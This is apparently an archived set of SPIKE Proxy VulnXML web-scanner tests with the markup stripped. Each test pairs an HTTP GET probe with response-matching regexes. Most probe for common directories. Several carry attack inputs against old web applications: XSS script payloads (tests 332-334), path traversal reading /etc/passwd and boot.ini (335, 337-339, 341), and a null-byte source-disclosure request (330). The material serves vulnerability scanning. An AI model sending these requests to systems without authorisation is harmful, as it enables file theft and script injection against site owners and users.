generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-315.xml0100664000076500007650000000711207566204543017556 0ustar davedave (hostingcontroller/) "This might be interesting...probably HostingController 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hostingcontroller/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-316.xml0100664000076500007650000000703407566204543017562 0ustar davedave (htdocs/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /htdocs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-317.xml0100664000076500007650000000703007566204543017557 0ustar davedave (html/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /html/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-318.xml0100664000076500007650000000706707566204543017572 0ustar davedave (HyperStat/stat_what.log) "Just found this file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /HyperStat/stat_what.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-319.xml0100664000076500007650000000706607566204543017572 0ustar davedave (hyperstat/stat_what.log) "Just found this log..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hyperstat/stat_what.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-31.xml0100664000076500007650000000725307566204543017477 0ustar davedave (index.html.ee) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ee HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-320.xml0100664000076500007650000000703207566204543017553 0ustar davedave (ibill/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ibill/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-321.xml0100664000076500007650000000703007566204543017552 0ustar davedave (idea/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /idea/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-322.xml0100664000076500007650000000703207566204543017555 0ustar davedave (ideas/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ideas/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-323.xml0100664000076500007650000000706207566204543017561 0ustar davedave (image/) "index of image directory available" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /image/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-324.xml0100664000076500007650000000706407566204543017564 0ustar davedave (images/) "index of image directory available" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /images/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-325.xml0100664000076500007650000000707507566204543017567 0ustar davedave (img-sys/) "Default image directory should not allow directory listing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /img-sys/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-326.xml0100664000076500007650000000703407566204543017563 0ustar davedave (import/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /import/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-327.xml0100664000076500007650000000720107566204543017560 0ustar davedave (inc/sendmail.inc) "Basilix allows its configuration files to be downloaded 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /inc/sendmail.inc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This program is free software 200 This program is free software 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-328.xml0100664000076500007650000000704007566204543017562 0ustar davedave (includes/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /includes/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-329.xml0100664000076500007650000000704007566204543017563 0ustar davedave (incoming/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /incoming/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-32.xml0100664000076500007650000000725307566204543017500 0ustar davedave (index.html.el) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.el HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-330.xml0100664000076500007650000000722507566204543017560 0ustar davedave (index.jsp%00x) "Bea WebLogic 6.1 SP 2 discloses souce by appending %00x to a jsp request. Upgrade to a version newer than 6.2 SP 2 for Win2k." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.jsp%00x HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <%= 200 <%= 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-331.xml0100664000076500007650000000725707566204543017566 0ustar davedave (index.php/123) "Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php/123 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Premature end of script headers 200 Premature end of script headers 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-332.xml0100664000076500007650000000754507566204543017567 0ustar davedave (index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >) "MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script > HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-333.xml0100664000076500007650000000752607566204543017567 0ustar davedave (index.php?action=storenew&username=<script>alert('Vulnerable')</script>) "SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-334.xml0100664000076500007650000000746707566204543017574 0ustar davedave (index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;) "PostNuke is vulnerable to cross site scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-335.xml0100664000076500007650000000727707566204543017574 0ustar davedave (index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc) "phpMyExplorer Allows attackers to read directories on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ resolv\.conf 200 resolv\.conf 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-336.xml0100664000076500007650000000717707566204543017574 0ustar davedave (index.php?file=index.php) "PHPNuke 5.4 allows file system paths to be shown in error messages." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?file=index.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Fatal error\: 200 Fatal error\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-337.xml0100664000076500007650000000735407566204543017572 0ustar davedave (index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd) "Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-338.xml0100664000076500007650000000725207566204543017570 0ustar davedave (index.php?page=../../../../../../../../../../boot.ini) "The PHP-Nuke Rocket add-in is vulnerable to file traversal 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?page=../../../../../../../../../../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-339.xml0100664000076500007650000000724407566204543017572 0ustar davedave (index.php?page=../../../../../../../../../../etc/passwd) "The PHP-Nuke Rocket add-in is vulnerable to file traversal 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-33.xml0100664000076500007650000000725307566204543017501 0ustar davedave (index.html.en) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.en HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-340.xml0100664000076500007650000000727707566204543017570 0ustar davedave (index.php?sql_debug=1) "The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?sql_debug=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SQL query\: 200 SQL query\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-341.xml0100664000076500007650000000727207566204543017564 0ustar davedave (index.php?|=../../../../../../../../../etc/passwd) "Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.php?|=../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-342.xml0100664000076500007650000000703007566204543017555 0ustar davedave (info/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /info/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-343.xml0100664000076500007650000000703607566204543017564 0ustar davedave (install/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /install/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-344.xml0100664000076500007650000000714407566204543017565 0ustar davedave (interchange/) "Interchange chat is installed. Look for a high-numbered port like 20xx to find it running." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /interchange/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-345.xml0100664000076500007650000000704007566204543017561 0ustar davedave (intranet/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /intranet/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-346.xml0100664000076500007650000000707107566204543017566 0ustar davedave (ip.txt) "This may be User Online from http://www.elpar.net version 2.0 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ip.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-347.xml0100664000076500007650000000707607566204543017574 0ustar davedave (java-sys/) "Default Java directory should not allow directory listing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /java-sys/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-348.xml0100664000076500007650000000703007566204543017563 0ustar davedave (java/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /java/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-349.xml0100664000076500007650000000702307566204543017566 0ustar davedave (javadoc/) "Documentation...?" 